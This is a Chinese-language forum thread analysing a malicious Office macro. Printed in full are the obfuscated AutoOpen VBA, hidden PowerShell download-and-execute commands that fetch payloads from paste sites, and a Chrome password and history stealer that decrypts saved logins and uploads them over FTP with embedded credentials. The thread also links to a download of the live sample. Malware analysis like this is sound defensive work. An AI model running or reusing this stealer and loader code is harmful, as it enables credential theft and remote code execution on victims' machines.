cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + " "
"cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc = "cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc"
cQB3AG8AZQBoAGYAcQB3lAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADc =
cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA = cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA + "A"
Shell cQB3AG8AZQBoAGYAcQB3AGkAOQBlAGgAZgBxAHcAaQBlAG8AZgBoAG8AaQAzADkAMQA4ADIAeQAzADQAMAA5ADcAMQAyADMAeQAwADkANAAxADIAMwB5ADAAOQA0AGgAYwAyADkAMwA4ADQAMAA5ADEAMgAzAGgANAAwADkAMQAyAGgAMwA5ADQAMAAxADIAaABmADMA, vbHide
End Sub
Sub AutoOpen()
auto_open
End Sub
Sub Workbook_Open()
auto_open
End Sub


基本上混淆不严重,一眼就看出来了比较好处理,写个人脚本过滤一下就行,当然还是有捷径的

[Asm] 纯文本查看 复制代码
?
1
2
3
4
PoWeRsHeLL.ExE -NoP -W HiDdEn -ExEc ByPaSs -NoNI -enc SQBFAFgAIAAoAE4AZQBXAC0ATwBiAEoAZQBDAHQAIABOAGUAdAAuAFcAZQBCAEMAbABJAGUATgB0ACkALgBEAG8AVwBuAEwAbwBBAGQAUwB0AFIAaQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBoAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AZQBmAHUAaABpAGgAZQBuAGUAZgAnACkA
// 处理过的要执行的命令
 
IEX (NeW-ObJeCt Net.WeBClIeNt).DoWnLoAdStRiNg('https://hastebin.com/raw/efuhihenef')     // -enc 后面跟着的base64加密解密后的数据

捷径就是认出前面几个字符是 powershell.exe 后火绒剑添加一下就好了·
image.png


下载地址其中要下载并执行的页面数据
处理过后,就是判断浏览器版本根据不同的版本执行不同页面中的命令
[Asm] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$major = [environment]::OSVersion.Version.Major;$menor = [environment]::OSVersion.Version.Minor;
$version = ("$major.$menor");
try
{
  if($version = "10.0")
    {"ejecutando 10.0";IEX (New-Object Net.WebClient).DownloadString('https://hastebin.com/raw/sukeveriho');}
  else
  {
    if($version = "6.3")
      {"ejecutando 6.3";IEX (New-Object Net.WebClient).DownloadString('https://hastebin.com/raw/sukeveriho');}
    else
      {
        if($version = "6.2")
          {"ejecutando 6.2";IEX (New-Object Net.WebClient).DownloadString('https://hastebin.com/raw/sukeveriho');}
        else
          {
        if($version = "6.1")
          {
          "ejecutando 6.1";
          $url="https://cdn-24.anonfile.com/A4v6P483n0/2c3d559f-1571620269/2.txt";
          $path="$env:temp\222.txt";
          (New-Object Net.WebClient).DownloadFile($url, $path);IEX (New-Object Net.WebClient).DownloadString($path);
          }
        else{}
      }
    }
  };
}
catch{};
exit
[/url]

重点看6.1版本的吧,因为它大,,, txt中还包含着一个1M多的base加密数据,代码也很直白,就是盗取浏览器的数据库信息
[Bash shell] 纯文本查看 复制代码
?
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
try
{
        TASKKILL /F /IM chrome.exe /T
}
catch
{
}
Start-Sleep -Seconds 3 Function Get-ChromeDump
 {
         [CmdletBinding()]param([Parameter(Mandatory = False)]OutFile = "env:temp\1.txt");
        Add-Type -Assembly System.Security;
        if(([System.Security.Principal.WindowsIdentity]::GetCurrent()).IsSystem)
        {
                Write-Warning "Unable to decrypt passwords contained in Login Data file as SYSTEM."//无法将登录数据文件中包含的密码作为系统解密。
                NoPasswords = True;
        }
        ;
        if([IntPtr]::Size -eq 8)
        {
        }
        else{
                assembly = [数据文件];
                Write-Verbose "[+]System.Data.SQLite.dll will be written to disk";
                content = [System.Convert]::FromBase64String(assembly);
                assemblyPath = "(env:LOCALAPPDATA)\System.Data.SQLite.dll";
                if(Test-path assemblyPath){
                        try{
                                Add-Type -Path assemblyPath;
                        }
                        catch{
                                Write-Warning "Unable to load SQLite assembly"//无法加载SQLite数据库
                                break;
                        }
                }
                else{                                                                                                        //用解密出来的DLL将SQLite数据加载
                        [System.IO.File]::WriteAllBytes(assemblyPath,content);
                        Write-Verbose "[+]Assembly for SQLite written to assemblyPath";
                        try{
                                Add-Type -Path assemblyPath;
                        }
                        catch{
                                Write-Warning "Unable to load SQLite assembly";
                                break;
                        }
                        ;
                }
                ;
                if(Get-Process | Where-Object {_.Name -like "*chrome*"})  //判断是否是Chrome浏览器
                {
                        Write-Warning "[+]Cannot parse Data files while chrome is running";
                        break;
                }
                ;
                OS = [environment]::OSVersion.Version;    //判断浏览器版本
                if(OS.Major -ge 6){
                        chromepath = "(env:LOCALAPPDATA)\Google\Chrome\User Data\Default";                        //获取浏览器用户SQLite数据库路径
                }
                else{
                        chromepath = "(env:HOMEDRIVE)\(env:HOMEPATH)\Local Settings\Application Data\Google\Chrome\User Data\Default";
                }
                ;
                if(!(Test-path chromepath)){
                        Throw "Chrome user data directory does not exist"; //数据库不存在
                }
                else{
                        if(Test-Path -Path "chromepath\Web Data"){
                                WebDatadb = "chromepath\Web Data"       //web数据库
                        }
                        ;
                        if(Test-Path -Path "chromepath\Login Data"){
                                loginDatadb = "chromepath\Login Data"                //用户数据库
                        }
                        ;
                        if(Test-Path -Path "chromepath\History"){
                                historydb = "chromepath\History"                //登入历史数据库
                        }
                        ;
                }
                ;
                if(!(NoPasswords)){                                                                //查询密码处理
                        connStr = "Data Source=loginDatadb;Read Only=True; Version=3;";
                        connection = New-Object System.Data.SQLite.SQLiteConnection(connStr);
                        OpenConnection = connection.OpenAndReturn();
                        Write-Verbose "Opened DB file loginDatadb"//用户数据库
                        query = "SELECT * FROM logins;";                        //数据库查询
                        dataset = New-Object System.Data.DataSet;
                        dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter(query,OpenConnection);
                        [void]dataAdapter.fill(dataset);
                        logins = @();
                        Write-Verbose "Parsing results of query query";
                        dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object
                        {
                                encryptedBytes = _.password_value;
                                username = _.username_value;
                                url = _.action_url;
                                decryptedBytes = [Security.Cryptography.ProtectedData]::Unprotect(encryptedBytes, null, [Security.Cryptography.DataProtectionScope]::CurrentUser);
                                plaintext = [System.Text.Encoding]::ASCII.GetString(decryptedBytes);    //解密字节
                                login = New-Object PSObject -Property @
                                {
                                        URL = url;
                                        PWD = plaintext;
                                        User = username;
                                }
                                ;
                                logins += login;
                        }
                        ;
                }
                ;
                connString = "Data Source=historydb; Version=3;";                                //切换数据库
                connection = New-Object System.Data.SQLite.SQLiteConnection(connString);
                Open = connection.OpenAndReturn();
                Write-Verbose "Opened DB file historydb";                                                //浏览历史数据库
                DataSet = New-Object System.Data.DataSet;
                query = "SELECT * FROM urls;";                                                                        //
                dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter(query,Open);
                [void]dataAdapter.fill(DataSet);
                History = @();
                dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object
                {
                        HistoryInfo = New-Object PSObject -Property @
                        {
                                Title = _.title;
                                URL = _.url;
                        }
                        ;
                        History += HistoryInfo;
                }
                ;
                if(!(OutFile)){    //OutFile 输出到文件temp\1.txt
                        "CHROME PASSWORDS`n";
                        logins | Format-Table URL,User,PWD -AutoSize;
                        "CHROME HISTORY`n";
                        History | Format-List Title,URL;
                }
                else {
                        "LOGINS`n" | Out-File OutFile;
                        logins | Out-File OutFile -Append;
                        "HISTORY`n" | Out-File OutFile -Append;
                        History | Out-File OutFile -Append;
                }
                ;
                Write-Warning "[!] Please remove SQLite assembly from here: assemblyPath";
        }
        ;
         function rtp{
                 Date = Get-Date -format d.M.yyyy;
                 Hour = Get-Date -format HH.mm.ss;
                 user = env:USERNAME;
                 Entropy = Get-Random -maximum 9999999;
                 tof = Date+"-"+Hour+"-"+user+"-"+Entropy+".txt";
                 File = "env:temp\1.txt";
                 ftp = "ftp://kakuzo:g3d0m4z08@files.000webhost.com/USERS/tof";        //上传至ftp文件夹
                 webclient = New-Object -TypeName System.Net.WebClient;
                 uri = New-Object -TypeName System.Uri -ArgumentList ftp;
                 webclient.UploadFile(uri, File);
        }
         Get-ChromeDump rtp



   至此样本已经一目了然了,主要功能就是盗取用户浏览器的数据信息,发送到ftp服务器上,就是我这个彩笔第一次见,我一开始就认为大头在加密的数据,然而它里面的大量base64加密后的数据解密后发现是一个其名为System.Data.SQLite.dll 是一个官方无害无毒善良的dll 主要用来处理SQLite数据库,有点大材小用。。
  样本除了宏代码容易被检查出来外,其它行为没有文件落地,在用户打开的文档后及其难发现自己已经中招。

上一张检测图
image.png

需要玩的可以自己下
链接:https://pan.baidu.com/s/1t6AYVz-eFrAh_DOXmqm70Q 提取码:xvuj 复制这段内容后打开百度网盘手机App,操作更方便哦      infected   

如有错误,还望指正,彩笔感激不尽!!!!

免费评分

参与人数 5威望 +1 吾爱币 +13 热心值 +5 收起 理由
天行键丶 + 1 + 1 热心回复!
天尊小帅 + 1 + 1 用心讨论,共获提升!
czb + 1 + 1 用心讨论,共获提升!
Hmily + 1 + 7 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
JuncoJet + 3 + 1 已经处理,感谢您对吾爱破解论坛的支持!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

hjm666
 楼主| hjm666 发表于 2019-11-13 12:58
hjm666 发表于 2019-11-13 12:54
@Hmily 求大佬删帖····  删那个吧·········那个没排版,大佬·····

好了····悔悟卡删了·  不必麻烦大佬了···
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复 支持 1

举报

hjm666
 楼主| hjm666 发表于 2019-11-14 08:47
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
jideco 发表于 2019-11-13 19:12
厉害啊,很好奇那个代码是怎么混淆的
有什么方法或者工具吗

工具也有相关在线工具你可以了解一下,方法的简单的混淆方法就是字符拼接,高级一点的也差不多是字符拼接,不过是利用了个种加密,或者是算法进行拼接字符,不过最终怎么混淆最后一定会执行的
如何升级?如何获得积分?积分对应解释说明!
回复 支持

举报

hjm666
 楼主| hjm666 发表于 2019-11-13 12:53
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
我丢·····  吃饭前发不是502嘛???!! 怎么发出去了···
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复 支持

举报

hjm666
 楼主| hjm666 发表于 2019-11-13 12:54
本帖最后由 hjm666 于 2019-11-13 12:55 编辑

@Hmily 求大佬删帖····  删那个吧·········那个没排版,大佬·····
如何快速判断一个文件是否为病毒!
回复 支持

举报

抱抱懿子
抱抱懿子 发表于 2019-11-13 12:57
hjm666 发表于 2019-11-13 12:54
@Hmily 求大佬删帖····  删那个吧·········那个没排版,大佬·····

我已经看完了,删了也没用
回复 支持

举报

hjm666
 楼主| hjm666 发表于 2019-11-13 12:59
a1635573150 发表于 2019-11-13 12:57
我已经看完了,删了也没用

我的错·······
回复 支持

举报

委员长_
委员长_ 发表于 2019-11-13 13:20
这就厉害了
回复 支持

举报

淡蓝Biner
淡蓝Biner 发表于 2019-11-13 13:39
压缩文件密码多少啊
回复 支持

举报

hjm666
 楼主| hjm666 发表于 2019-11-13 13:49
淡蓝Biner 发表于 2019-11-13 13:39
压缩文件密码多少啊

infected
回复 支持

举报

界神小号
界神小号 发表于 2019-11-13 13:51
大佬,我是自学vb的,我一直不知道你这个是vb的那个编辑器,哪些高亮显示和单词提醒是那个软件的,我一直用的是vb6.0
回复 支持

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
